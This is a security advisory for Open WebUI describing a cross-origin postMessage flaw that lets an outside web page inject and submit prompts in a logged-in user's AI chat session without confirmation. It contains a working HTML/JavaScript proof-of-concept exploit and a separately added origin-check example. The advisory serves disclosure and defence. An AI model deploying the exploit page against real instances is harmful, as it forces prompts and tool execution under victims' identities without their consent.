PT-2026-50479 · Pypi · Open-Webui
Published 2026-06-17 · Updated 2026-06-17 · CVE-2026-54007
CVSS v4.0: 7.1 (High)
Vector: AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
Summary
The chat message listener allows non-same-origin input:prompt and action:submit messages, so an external site can set prompt text and trigger submitPrompt() in an authenticated victim session. I validated this with a cross-origin attacker page that auto-posted messages and caused unauthorized POST /api/v1/chats/new and POST /api/chat/completions requests containing attacker-controlled prompts. This enables cross-site forced actions and model/tool execution under victim privileges without consent.
Details
The chat page's window message listener in src/lib/components/chat/Chat.svelte processes message types including input:prompt and action:submit without adequately enforcing same-origin restrictions. Based on code around lines ~597-616, input text is set directly from event.data.text; action:submit proceeds to submitPrompt() on the current prompt. The logic does not apply a strict origin allowlist and permits non-same-origin control of the chat input and submission flow, leading to cross-origin command execution in the victim's authenticated UI context. As a result, backend API calls (e.g., POST /api/v1/chats/new, POST /api/chat/completions) are sent under victim credentials.
Normally, via the input:prompt:submit postMessage type, this results in a "Confirm Prompt from Embed" confirmation dialog. However, combining the two other types, it is possible to achieve the same effect without this confirmation:
PoC
- Set up a local Open WebUI instance and log in to it, making sure a model is configured
- Host the following HTML anywhere and visit it (optionally change http://127.0.0.1:14000 to your instance Base URL):
```html
<h1>Click anywhere</h1>
<script>
  function sleep(ms) {
    return new Promise(r => setTimeout(r, ms));
  }
  onclick = async () => {
    w = window.open('http://127.0.0.1:14000');
    await sleep(2000);
    w.postMessage({ type: 'input:prompt', text: "INJECTED PROMPT" }, '*');
    await sleep(500);
    w.postMessage({ type: 'action:submit' }, '*');
  }
</script>
```
- Click anywhere on the page, then notice that, without further interaction, the "INJECTED PROMPT" is executed on the Open WebUI instance
Impact
Conditions required: The victim must be authenticated to Open WebUI in the browser (token cookie present).
This issue enables cross-site forced actions under the victim's identity. An attacker can silently inject prompts and trigger model/tool execution (e.g., code interpreter, web search, retrieval, terminal/tool servers) as the victim without confirmation.
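An added example (not Open WebUI's code or its patch) of the origin check that the Details section describes as missing: every prompt-setting or submit message type is gated on event.origin, and an allowlisted cross-origin embedder always goes through confirmation, so two separate messages cannot skip the dialog. The function names, the trustedEmbedOrigins allowlist and the data.text field on input:prompt:submit are assumptions.

```javascript
// Added illustration; not Open WebUI's code. Only the three message type
// strings come from the advisory; every other name here is hypothetical.
const GATED_TYPES = new Set(['input:prompt', 'action:submit', 'input:prompt:submit']);

// Decide what to do with one MessageEvent-like object {origin, data}.
// event.origin is filled in by the browser and cannot be set by the sender.
function classifyEmbedMessage(event, selfOrigin, trustedEmbedOrigins = []) {
  const data = event.data;
  if (data === null || typeof data !== 'object' || !GATED_TYPES.has(data.type)) {
    return 'ignore';
  }
  // Assumption: the two input:* types carry the prompt in data.text.
  if (data.type !== 'action:submit' && typeof data.text !== 'string') return 'reject';
  if (event.origin === selfOrigin) return 'accept';
  // Cross-origin embedders are never silent: every gated type needs consent,
  // so splitting one request into two messages cannot skip the dialog.
  if (trustedEmbedOrigins.includes(event.origin)) return 'confirm';
  return 'reject';
}

// Replay events against a minimal chat state; confirm(event) stands in for the dialog.
function replay(events, { selfOrigin, trustedEmbedOrigins = [], confirm = () => false }) {
  const state = { prompt: '', submitted: [] };
  for (const event of events) {
    let verdict = classifyEmbedMessage(event, selfOrigin, trustedEmbedOrigins);
    if (verdict === 'confirm') verdict = confirm(event) ? 'accept' : 'reject';
    if (verdict !== 'accept') continue;
    const { type, text } = event.data;
    if (type !== 'action:submit') state.prompt = text;
    if (type !== 'input:prompt' && state.prompt !== '') {
      state.submitted.push(state.prompt);
      state.prompt = '';
    }
  }
  return state;
}

// Constructed sample: the two-message sequence from the PoC, sent from another origin.
const SELF = 'http://127.0.0.1:14000';
const crossOriginSequence = [
  { origin: 'https://other.example', data: { type: 'input:prompt', text: 'INJECTED PROMPT' } },
  { origin: 'https://other.example', data: { type: 'action:submit' } },
];
console.log(replay(crossOriginSequence, { selfOrigin: SELF }));
```

In a real listener the same classification would run at the top of the message handler, before any branch reads event.data.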
Original Agent Report
Fix
Origin Validation Error
Weakness Enumeration
Related Identifiers
Affected Products
Open-Webui